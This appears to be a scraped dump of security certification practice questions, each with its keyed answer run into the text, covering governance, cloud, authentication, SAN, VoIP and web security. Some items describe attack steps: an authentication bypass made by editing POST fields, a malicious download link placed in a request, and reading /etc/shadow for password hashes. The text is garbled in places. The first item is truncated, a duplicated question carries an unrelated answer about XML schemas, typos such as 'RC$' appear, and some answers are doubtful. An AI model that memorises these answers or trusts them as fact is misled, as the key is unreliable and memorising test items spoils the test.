Executive management is asking for a new manufacturing control and workflow automation solution. This application will facilitate management of proprietary information and closely guarded corporate trade secrets.The information security team has been a part of the department meetings and come away with the following notes:-Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee management application, a cloud-based SaaS application.-Sales is asking for easy order tracking to facilitate feedback to customers.-Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with data ownership questions and legal jurisdiction.-Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs to be quick and easy.-Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-only access to the enti Human Resources
he helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters, which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO). A. Web cameras B. Email C. Instant messaging D. BYOD E. Desktop sharing F. Presence Instant messaging Desktop sharing
An intruder was recently discovered inside the data center, a highly sensitive area. To gain access, the intruder circumvented numerous layers of physical and electronic security measures. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE). Facility management Data center operations Information technology
A completely new class of web-based vulnerabilities has been discovered. Claims have been made that all common web-based development frameworks are susceptible to attack. Proof-of-concept details have emerged on the Internet. A security advisor within a company has been asked to provide recommendations on how to respond quickly to these vulnerabilities. Which of the following BEST describes how the security advisor should respond? Assess the reliability of the information source, likelihood of exploitability and impact to hosted data. Attempt to exploit via the proof-of-concept code. Consider remediation options
A company sales manager received a memo from the companyís financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial departmentís change. All software products will continue to go through new development in the coming year. Which of the following should the sales manager do to ensure the company stays out of trouble? A. Discuss the issue with the software product's user groups B. Consult the company's legal department on practices and law C. Contact senior finance management and provide background information D. Seek industry outreach for software practices and law Consult the company's legal department on practices and law
A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware. Which of the following is the NEXT step that the security team should take? A. Purchase new hardware to keep the malware isolated B. Develop a policy to outline what will be required in the secure lab C. Construct a series of VMs to host the malware environment D. Create a proposal and present it to management for approval Create a proposal and present it to management for approval
A company has issued a new mobile device policy permitting BYOD and company-issued devices. The company-issued device has a managed middleware client that restricts the applications allowed on company devices and provides those that are approved. The middleware client provides configuration standardization for both company owned and BYOD to secure data and communication to the device according to industry best practices. The policy states that, ìBYOD clients must meet the companyís infrastructure requirements to permit a connection.î The company also issues a memorandum separate from the policy, which provides instructions for the purchase, installation, and use of the middleware client on BYOD. Which of the following is being described? A. Asset management B. IT governance C. Change management D. Transference of risk IT governance
A security engineer on a large enterprise network needs to schedule maintenance within a fixed window of time. A total outage period of four hours is permitted for servers. Workstations can undergo maintenance from 8:00 pm to 6:00 am daily. Which of the following can specify parameters for the maintenance work? (Select TWO). A. Managed security service B. Memorandum of understanding C. Quality of service D. Network service provider E. Operating level agreement Memorandum of understanding Operating level agreement
An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Data sovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktop sessions. To facilitate communications and improve productivity, staff at the third party has been provided with corporate email accounts that are only accessible via the remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the following additional controls should be implemented to prevent data loss? (Select THREE). A. Implement hashing of data in transit B. Session recording and capture C. Disable cross session cut and paste D. Monitor approved credit accounts E. User access audit reviews Disable cross session cut and paste User access audit reviews
A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution has been in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk analysis before moving on to the next phase. Which of the following software development methods is MOST applicable? A. Spiral model B. Incremental model C. Waterfall model D. Agile model Waterfall model
An attacker attempts to create a DoS event against the VoIP system of a company. The attacker uses a tool to flood the network with a large number of SIP INVITE traffic. Which of the following would be LEAST likely to thwart such an attack? A. Install IDS/IPS systems on the network B. Force all SIP communication to be encrypted C. Create separate VLANs for voice and data traffic D. Implement QoS parameters on the switches Implement QoS parameters on the switches
The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing, system log gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendor responses to the RFQ. Which of the following questions is the MOST important? A. What are the protections against MITM? B. What accountability is built into the remote support application? C. What encryption standards are used in tracking database? D. What snapshot or "undo" features are present in the application? E. What encryption standards are used in remote desktop and file transfer functionality? What accountability is built into the remote support application?
A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now? A. Agile B. Waterfall C. Scrum D. Spiral Waterfall
A security manager has received the following email from the Chief Financial Officer (CFO):ìWhile I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance targets. As things currently stand, we do not allow employees to work from home but this is something I am willing to allow so we can get back on track. What should we do first to securely enable this capability for my group?î Based on the information provided, which of the following would be the MOST appropriate response to the CFO? Work with the executive management team to revise policies before allowing any remote access
Three companies want to allow their employees to seamlessly connect to each otherís wireless corporate networks while keeping one consistent wireless client configuration. Each company wants to maintain its own authentication infrastructure and wants to ensure that an employee who is visiting the other two companies is authenticated by the home office when connecting to the other companiesí wireless network. All three companies have agreed to standardize on 802.1x EAP-PEAP-MSCHAPv2 for client configuration. Which of the following should the three companies implement? The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation
Company XYZ provides cable television service to several regional areas. They are currently installing fiber-to-the-home in many areas with hopes of also providing telephone and Internet services. The telephone and Internet services portions of the company will each be separate subsidiaries of the parent company. The board of directors wishes to keep the subsidiaries separate from the parent company. However, all three companies must share customer data for the purposes of accounting, billing, and customer authentication. The solution must use open standards, and be simple and seamless for customers, while only sharing minimal data between the companies. Which of the following solutions is BEST suited for this scenario? The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SP
Company A needs to export sensitive data from its financial system to company Bís database, using company Bís API in an automated manner. Company Aís policy prohibits the use of any intermediary external systems to transfer or store its sensitive data, therefore the transfer must occur directly between company Aís financial system and company Bís destination server using the supplied API. Additionally, company Aís legacy financial software does not support encryption, while company Bís API supports encryption. Which of the following will provide end-to-end encryption for the data transfer while adhering to these requirements? Company A must install an SSL tunneling software on the financial system
A security company is developing a new cloud-based log analytics platform. Its purpose is to allow: -Customers to upload their log files to the "big data" platform -Customers to perform remote log search -Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending, insights, and/or discovery Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE). Secure storage and transmission of API keys Secure protocols for transmission of log files and search results Multi-tenancy with RBAC support
A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Which of the following controls has likely been implemented by the developers? A. SSL certificate revocation B. SSL certificate pinning C. Mobile device root-kit detection D. Extended Validation certificates SSL certificate pinning
Common Business Documents: Interconnection Security Agreement(ISA) Memorandum of Understanding(MOU) Service Level Agreement(SLA) Operating Level Agreement(OLA) Nondisclosure Agreement(NDA) Business Partnership Agreement(BPA) Memorandum of Agreement(MOA) Common Acronyms
A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. The administrator deploys DNSSEC extensions to the domain names and infrastructure. Which of the following security goals does this meet? (Select TWO). A. Availability B. Authentication C. Integrity D. Confidentiality E. Encryption Authentication Integrity
The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system is out of support because the vendor and security patches are no longer released. Additionally, this is a proprietary embedded system and little is documented and known about it. Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system? A. Virtualize the system and migrate it to a cloud provider B. Segment the device on its own secure network C. Install an antivirus and HIDS on the system D. Hire developers to reduce vulnerabilities in the code Segment the device on its own secure network
An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service. Which of the following should the company ensure is supported by the third-party? (Select TWO). A. LDAP/S B. SAML C. NTLM D. OAUTH E. Kerberos SAML Kerberos
An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. After the upgrade, an unauthorized intrusion into the system was detected. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly. Which of the following has been overlooked in securing the system? (Select TWO). A. The company's IDS signatures were not updated B. The company's custom code was not patched C. The patch caused the system to revert to http D. The software patch was not cryptographically signed E. The wrong version of the patch was used F. Third-party plug-ins were not patched The company's custom code was not patched Third-party plug-ins were not patched
A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not have the resources or the scalability to adequately serve their clients. Since it is an e-discovery firm where chain of custody is important, which of the following scenarios should they consider? A. Offload some data processing to a public cloud B. Aligning their client intake with the resources available C. Using a community cloud with adequate controls D. Outsourcing the service to a third party cloud provider Using a community cloud with adequate controls
A company is deploying a new iSCSI-based SAN. The requirements are as follows: -SAN nodes must authenticate each other -Shared keys must NOT be used -Do NOT use encryption in order to gain performance Which of the following design specifications meet all the requirements? (Select TWO). IPSec using AH with PKI certificates for authentication Initiators and targets use CHAP authentication
Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZís hardware costs by combining multiple physical hosts through the use of virtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrative complexity on the proposal. Which of the following BEST describes the core concerns of the security architect? Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer.
A university requires a significant increase in web and database server resources for one week, twice a year, to handle student registration. The web servers remain idle for the rest of the year. Which of the following is the MOST cost effective way for the university to securely handle student registration? Move the web servers to an elastic public cloud while keeping the database servers local
Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption. Which of the following solutions minimizes the performance impact on the router? A. Deploy inline network encryption devices B. Install an SSL acceleration appliance C. Require all core business applications to use encryption D. Add an encryption module to the router and configure IPSec Deploy inline network encryption devices
In order to reduce costs and improve employee satisfaction, a large corporation is creating a BYOD policy. It will allow access to email and remote connections to the corporate enterprise from personal devices; provided they are on an approved device list. Which of the following security measures would be MOST effective in securing the enterprise under the new policy? (Select TWO). A. Provide free email software for personal devices B. Encrypt data in transit for remote access C. Require smart card authentication for all devices D. Implement NAC to limit insecure devices access E. Enable time of day restrictions for personal devices Encrypt data in transit for remote access Implement NAC to limit insecure devices access
A security administrator is tasked with implementing two-factor authentication for the company VPN. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO). The VPN concentrator's certificate private key must be installed on the VPN concentrator The CA's certificate public key must be installed on the VPN concentrator
Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices. Which of the following should Ann implement to stop modified copies of her software from running on mobile devices? A. Single sign-on B. Identity propagation C. Remote attestation D. Secure code review Remote attestation
Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete? They should use the username format: first.lastname@company.com, together with a password and their 6-digit code
An industry organization has implemented a system to allow trusted authentication between all of its partners. The system consists of a web of trusted RADIUS servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-in-the-middle attack. Which of the following controls should be implemented to mitigate the attack in the future? A. Use PAP for secondary authentication on each RADIUS server B. Disable unused EAP methods on each RADIUS server C. Enforce TLS connections between RADIUS servers D. Use a shared secret for each pair of RADIUS servers Enforce TLS connections between RADIUS servers
Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method. Which of the following methodologies should be adopted? The company should use the method recommended by other respected information security organizations
Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform? A. Aggressive patch management on the host and guest OSs B. Host based IDS sensors on all guest OSs C. Different antivirus solutions between the host and guest OSs D. Unique Network Interface Card (NIC) assignment per guest OS Aggressive patch management on the host and guest OSs
Two universities are making their 802.11n wireless networks available to the other universityís students. The infrastructure will pass the studentís credentials back to the home school for authentication via the Internet.The requirements are: -Mutual authentication of clients and authentication server -The design should not limit connection speeds -Authentication must be delegated to the home school -No password should be sent unencrypted The following design was implemented:WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless securityRADIUS proxy servers will be used to forward authentication requests to the home schoolThe RADIUS servers will have certificates from a common public certificate authorityA strong shared secret will be used for RADIUS server authenticationWhich of the following security considerations should be added to the design? The transport layer between the RADIUS servers should be secured
A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware. Currently, the company projects a total cost of $50,000 for the next three years responding to and eradicating workstation malware. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS. -The first quote requires a $10,000 one-time fee -The second quote requires a $15,000 one-time fee -The third quote has no one-time fee Which solution should the company select if the contract is only valid for three years? Second quote
Customers are receiving emails containing a link to malicious software. These emails are subverting spam filters. The email reads as follows:Delivered-To: customer@example.comReceived: by 10.14.120.205 Mon, 1 Nov 2010 11:15:24 -0700 (PDT)Received: by 10.231.31.193 Mon, 01 Nov 2010 11:15:23 -0700 (PDT)Return-Path: <IT@company.com>Received: from 127.0.0.1 for <customer@example.com>; Mon, 1 Nov 2010 13:15:14 -0500 (envelope-from <IT@company.com>)Received: by smtpex.example.com (SMTP READY)with ESMTP (AIO); Mon, 01 Nov 2010 13:15:14 -0500Received: from 172.18.45.122 by 192.168.2.55; Mon, 1 Nov 2010 13:15:14 -0500From: Company <IT@Company.com>To: "customer@example.com" <customer@example.com>Date: Mon, 1 Nov 2010 13:15:11 -0500Subject: New Insurance ApplicationThread-Topic: New Insurance ApplicationPlease download and install software from the site below to maintain full access to your account.www.examplesite.com________________________________Additional information: The authorized mail servers IPs are 192.168.2.10 and 192.168.2.11.The networkís subnet is 192.168.2.0/25.Which of the follow Block port 25 on the firewall for all unauthorized mail servers Shut down the SMTP service on the unauthorized mail server
A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a userís age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range.Users have reported that the website is not functioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring. Which of the following is the MOST likely situation that has occurred? The age variable has had an integer overflow and was assigned a very small negative number which led to unpredictable application behavior. Improper error handling prevented the application from recovering
A company has decided to change its current business direction and refocus on core business. Consequently, several company sub-businesses are in the process of being sold-off. A security consultant has been engaged to advise on residual information security concerns with a de-merger. From a high-level perspective, which of the following BEST provides the procedure that the consultant should follow? Identify the current state from a security viewpoint. Based on the demerger, assess what the security gaps will be from a physical, technical, DR. and policy/awareness perspective
It has come to the IT administratorís attention that the ìpost your commentî field on the company blog page has been exploited, resulting in cross-site scripting attacks against customers reading the blog. Which of the following would be the MOST effective at preventing the ìpost your commentî field from being exploited? A. Update the blog page to HTTPS B. Filter metacharacters C. Install HIDS on the server D. Patch the web application E. Perform client side input validation Filter metacharacters
A business unit of a large enterprise has outsourced the hosting and development of a new external website which will be accessed by premium customers, in order to speed up the time to market timeline. Which of the following is the MOST appropriate? The eternal party providing the hosting and website development should be obligated under contract to provide a secure service which is regularly tested (vulnerability and penetration). SLAs should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime.
An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.com, mail.example.org, archive.example.com, and www.example.org with the same certificate. Which of the following would allow the administrator to secure those domains with a single issued certificate? A. Intermediate Root Certificate B. Wildcard Certificate C. EV x509 Certificate D. Subject Alternative Names Certificate Subject Alternative Names Certificate
An administrator wishes to replace a legacy clinical software product as it has become a security risk. The legacy product generates $10,000 in revenue a month. The new software product has an initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will generate $15,000 in revenue per month and be more secure. How many years until there is a return on investment for this new package? A. 1 B. 2 C. 3 D. 4 4
A large company is preparing to merge with a smaller company. The smaller company has been very profitable, but the smaller companyís main applications were created in-house. Which of the following actions should the large companyís security administrator take in preparation for the merger? A security assessment should be performed to establish the risks of integration or co-existence
Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information? A. Deduplication B. Data snapshots C. LUN masking D. Storage multipaths LUN masking
Company ABC is hiring customer service representatives from Company XYZ. The representatives reside at Company XYZís headquarters. Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems? Require Company XYZ employees to establish an encrypted VDI session to the required systems
A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. The CISO wants to know upfront what the projected TCO would be before looking further into this concern. Two vendor proposals have been received: Bundled offering expected to be $100,000 per year.Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0.5 FTE per year.Internal employee costs are averaged to be $80,000 per year per FTE. Based on calculating TCO of the two vendor proposals over a 5 year period, which of the following options is MOST accurate? Based on cost alone, having an outsourced solution appears cheaper
A port in a fibre channel switch failed, causing a costly downtime on the companyís primary website. Which of the following is the MOST likely cause of the downtime? A. The web server iSCSI initiator was down B. The web server was not mulitpathed C. The SAN snapshots were not up-to-date D. The SAN replication to the backup site failed The web server was not multipathed
An internal development team has migrated away from Waterfall development to use Agile development. Overall, this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. However, some staff within the security team have contended that Agile development is not secure. Which of the following is the MOST accurate statement? Agile development has different phases and timings compared to Waterfall. Security activities need to be adapted and performed within relevant Agile phases
A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. Which of the following are true statements? (Select TWO). The client-server handshake could not negotiate strong ciphers The client-server handshake is configured with a wrong priority
Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO). LUN masking/mapping Port mapping
An enterprise must ensure that all devices that connect to its networks have been previously approved. The solution must support dual factor mutual authentication with strong identity assurance. In order to reduce costs and administrative overhead, the security architect wants to outsource identity proofing and second factor digital delivery to the third party. Which of the following solutions will address the enterprise requirements? Implementing 802.1x with EAP-TTLS across the infrastructure
A security administrator is performing VDI traffic data collection on a virtual server which migrates from one host to another. While reviewing the data collected by the protocol analyzer, the security administrator notices that sensitive data is present in the packet capture. Which of the following should the security administrator recommend to ensure the confidentiality of sensitive information during live VM migration, while minimizing latency issues? A separate physical interface placed on a private VLAN should be configured for live host operations
Joe is a security architect who is tasked with choosing a new NIPS platform that has the ability to perform SSL inspection, analyze up to 10Gbps of traffic, can be centrally managed and only reveals inspected application payload data to specified internal security employees. Which of the following steps should Joe take to reach the desired outcome? Research new technology vendors to look for potential products. Contribute to an RFP and then evaluate RPF responses to ensure that the vendor product meets all mandatory requirements. Test the product and make a product recommendation.
A penetration tester is inspecting traffic on a new mobile banking application and sends the following web request:POST http://www.example.com/resources/NewBankAccount HTTP/1.1Content-type: application/json{ ìaccountî: [ { ìcreditAccountî:îCredit Card Rewards accountî} { ìsalesLeadRefî:îwww.example.com/badcontent/exploitme.exeî} ], ìcustomerî:[ { ìnameî:îJoe Citizenî} { ìcustRefî:î3153151î} ]}The banking website responds with:HTTP/1.1 200 OK{ ìnewAccountDetailsî: [ { ìcardNumberî:î1234123412341234î} { ìcardExpiryî:î2020-12-31î} { ìcardCVVî:î909î} ],ìmarketingCookieTrackerî:ìJSESSIONID=000000001îìreturnCodeî:ìAccount added successfullyî}Which of the following are security weaknesses in this example? (Select TWO). Missing input validation on some fields Sensitive details communicated in clear-text
Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO). A. Jailbroken mobile device B. Reconnaissance tools C. Network enumerator D. HTTP interceptor E. Vulnerability scanner F. Password cracker HTTP interceptor Vulnerability scanner
Ann is testing the robustness of a marketing website through an intercepting proxy. She has intercepted the following HTTP request:POST /login.aspx HTTP/1.1Host: comptia.orgContent-type: text/htmltxtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=trueWhich of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass? Remove the txtPassword post data and change alreadyLoggedIn from false to true
An organization has implemented an Agile development process for front end web application development. A new security architect has just joined the company and wants to integrate security activities into the SDLC.Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO). Static and dynamic analysis is run as part of integration For each major iteration penetration testing is performed
ABC Corporation uses multiple security zones to protect systems and information, and all of the VM hosts are part of a consolidated VM infrastructure. Each zone has different VM administrators. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone? Organize VM hosts into containers based on security zone and restrict access using an ACL
A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application. The application utilizes streaming video that can be viewed both on computers and mobile devices. The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead. Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO) Use RC$ with a nonce generated IV Use AES in Counter mode
ABC Company must achieve compliance for PCI and SOX. Which of the following would BEST allow the organization to achieve compliance and ensure security? (Select THREE). A. Establish a list of users that must work with each regulations B. Establish a list of devices that must meet each regulation C. Centralize management of all devices on the network D. Compartmentalize the network E. Establish a company framework F. Apply technical controls to meet compliance with the regulation Establish a list of devices that must meet each regulation Compartmentalize the network Apply technical controls to meet compliance with the regulation
A pentester must attempt to crack passwords on a windows domain that enforces strong complex passwords. Which of the following would crack the MOST passwords in the shortest time period? A. Online password testing B. Rainbow tables attack C. Dictionary attack D. Brute force attack Rainbow tables attack
A security analyst, Ann, states that she believes Internet facing file transfer servers are being attacked. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers? Compare the current activity to the baseline of normal activity
A security analyst, Ann, states that she believes Internet facing file transfer servers are being attacked. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers? Use well formed standard compliant XML and strict schemas
A recently hired security administrator is advising developers about the secure integration of a legacy in-house application with a new cloud based processing system. The systems must exchange large amounts of fixed format data such as names, addresses, and phone numbers, as well as occasional chunks of data in unpredictable formats. The developers want to construct a new data format and create custom tools to parse and process the data. The security administrator instead suggests that the developers: A. Create a custom standard to define the data B. Use well formed standard compliant XML and strict schemas C. Only document the data format in the parsing application code D. Implement a de facto corporate standard for all analyzed data Use well formed standard compliant XML and strict schemas
A user is suspected of engaging in potentially illegal activities. Law enforcement has requested that the user continue to operate on the network as normal. However, they would like to have a copy of any communications from the user involving certain key terms. Additionally, the law enforcement agency has requested that the user's ongoing communication be retained in the user's account for future investigations. Which of the following will BEST meet the goals of law enforcement? Place a legal hold on the user's email account. Next, perform e-discovery searches to collect applicable emails
An administrator has enabled salting for users' passwords on a UNIX box. A penetration tester must attempt to retrieve password hashes. Which of the following files must the penetration tester use to eventually obtain passwords on the system? (Select TWO). A. /etc/passwd B. /etc/shadow C. /etc/security D. /etc/password E. /sbin/login F. /bin/bash /etc/passwd /etc/shadow
The latest independent research shows that cyber attacks involving SCADA systems grew an average of 15% per year in each of the last four years, but that this yearís growth has slowed to around 7%. Over the same time period, the number of attacks against applications has decreased or stayed flat each year. At the start of the measure period, the incidence of PC boot loader or BIOS based attacks was negligible. Starting two years ago, the growth in the number of PC boot loader attacks has grown exponentially. Analysis of these trends would seem to suggest which of the following strategies should be employed? Spending on SCADA security controls should stay stead; application control spending should decrease slightly and spending on PC boot loader protections should increase substantially
Which of the following would be used in forensic analysis of a compromised Linux system? (Select THREE). Check log files for logins form unauthorized IPs Check timestamps for files modified around time of compromise Verify the MD5 checksum of system binaries
The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. The following information is compiled:Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0All callers are connected to the same switch and are routed by a router with five built-in interfaces. The upstream router interfaceís MAC is 00-01-42-32-ab-1aA packet capture shows the following:09:05:15.934840 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)09:06:16.124850 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)09:07:25.439811 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)09:08:10.937590 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2305, seq 1, length 6553409:08:10.937591 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2306, seq 2, length 6553409:08:10.937592 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2307, seq 3, length 65534Which of the following is occurring on the network? A denial of service attack is targeting at the router
An organization recently upgraded its wireless infrastructure to support 802.1x and requires all clients to use this method. After the upgrade, several critical wireless clients fail to connect because they are only pre-shared key compliant. For the foreseeable future, none of the affected clients have an upgrade path to put them into compliance with the 802.1x requirement. Which of the following provides the MOST secure method of integrating the non-compliant clients into the network? Create a separate SSID with a pre-shared key to support the legacy clients and rotate the key at random intervals
The following has been discovered in an internally developed application:Error - Memory allocated but not freed:char *myBuffer = malloc(BUFFER_SIZE);if (myBuffer != NULL) { *myBuffer = STRING_WELCOME_MESSAGE; printf(ìWelcome to: %s\nî, myBuffer);}exit(0);Which of the following security assessment methods are likely to reveal this security weakness? (Select TWO). A. Static code analysis B. Memory dumping C. Manual code review D Application sandboxing Static code analysis Manual code review
A medical device manufacturer has decided to work with another international organization to develop the software for a new robotic surgical platform to be introduced into hospitals within the next 12 months. In order to ensure a competitor does not become aware, management at the medical device manufacturer has decided to keep it secret until formal contracts are signed. Which of the following documents is MOST likely to contain a description of the initial terms and arrangement and is not legally enforceable? A. OLA B. BPA C. SLA D. SOA E. MOU MOU
After the install process, a software application executed an online activation process. After a few months, the system experienced a hardware failure. A backup image of the system was restored on a newer revision of the same brand and model device. After the restore, the specialized application no longer works. Which of the following is the MOST likely cause of the problem? A. The binary files used by the application have been modified by malware B. The application is unable to perform remote attestation due to blocked ports C. The restored image backup was encrypted with the wrong key D. The hash key summary of hardware and installed software no longer match The hash key summary of hardware and installed software no longer match
A bank is in the process of developing a new mobile application. The mobile client renders content and communicates back to the company servers via REST/JSON calls. The bank wants to ensure that the communication is stateless between the mobile application and the web services gateway. Which of the following controls MUST be implemented to enable stateless communication? A. Generate a one-time key as part of the device registration process B. Required SSL between the mobile application and the web services gateway C. The jsession cookie should be stored securely after authentication D. Authentication assertion should be stored securely on the client Authentication assertion should be stored securely on the client
The network administrator at an enterprise reported a large data leak. One compromised server was used to aggregate data from several critical application servers and send it out to the Internet using HTTPS. Upon investigation, there have been no user logins over the previous week and the endpoint protection software is not reporting any issues. Which of the following BEST provides insight into where the compromised server collected the information? Review the flow data against each server's baseline communications profile
Wireless users are reporting issues with the companyís video conferencing and VoIP systems. The security administrator notices internal DoS attacks from infected PCs on the network causing the VoIP system to drop calls. The security administrator also notices that the SIP servers are unavailable during these attacks. Which of the following security controls will MOST likely mitigate the VoIP DoS attacks on the network? (Select TWO). A. Install a HIPS on the SIP servers B. Configure 802.1X on the network C. Update the corporate firewall to block attacking addresses D. Configure 802.11e on the network E. Configure 802.1q on the network Install a HIPS on the SIP servers Configure 802.11e on the network
During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited for compliance to regulations. The audit discovers that 40 percent of the desktops do not meet requirements. Which of the following is the MOST likely cause of the noncompliance? A. The devices are being modified and settings are being overridden in production B. The patch management system is causing the devices to be noncompliant after issuing the latex patches C. The desktop applications were configured with the default username and password D. 40 percent of the devices use full disk encryption The devices are being modified and settings are being overridden in production
A company that must comply with regulations is searching for a laptop encryption product to use for its 40,000 end points. The product must meet regulations but also be flexible enough to minimize overhead and support in regards to password resets and lockouts. Which of the following implementations would BEST meet the needs? A file-based encryption product using profiles to target areas on the file system to encrypt
A company decides to purchase commercially available software packages. This can introduce new security risks to the network. Which of the following is the BEST description of why this is true? Commercially available software packages are often widely available. Information concerning vulnerabilities is often kept internal to the company that developed the software
A firm’s Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internally developed. The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product. The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product’s reliability, stability, and performance. Which of the following would provide the MOST thorough testing and satisfy the CEO’s requirements? Sign an NDA with a large security consulting firm and use the firm to perform Grey box testing and address all findings
A company provides on-demand cloud computing resources for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for customer access to the administrative website. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data from customer A was found on a hidden directory within the VM of company B. Company B is not in the same industry as company A and the two are not competitors. Which of the following has MOST likely occurred? Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to access each and move the data
A system worth $100,000 has an exposure factor of eight percent and an ARO of four. Which of the following figures is the systemís SLE? A. $2,000 B. $8,000 C. $12,000 D. $32,000 $8,000
